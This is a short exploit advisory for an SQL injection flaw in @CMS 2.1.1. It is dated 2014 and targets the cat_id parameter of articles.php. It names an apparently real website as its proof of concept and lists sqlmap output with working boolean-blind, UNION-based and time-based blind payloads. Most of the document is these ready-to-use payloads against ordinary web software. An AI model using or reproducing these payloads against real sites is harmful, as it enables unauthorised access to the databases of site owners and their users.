# SQL Injection on @CMS 2.1.1 Stable # Risk: High # CWE number: CWE-89 # Date: 22/08/2014 # Vendor: www.atcode.net # Author: Felipe " Renzi " Gabriel # Contact: renzi@linuxmail.org # Tested on: Linux Mint # Vulnerable File: articles.php # Exploit: http://host/articles.php?cat_id=[SQLI] # PoC: http://carla-coluXmna.de/articles.php?cat_id=[SQLI] --- "SQLi using sqlmap."--- Place: GET Parameter: cat_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo Type: UNION query Title: MySQL UNION query (NULL) - 10 columns Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: cat_id=5' AND SLEEP(5) AND 'XLrs'='XLrs --- # Thank's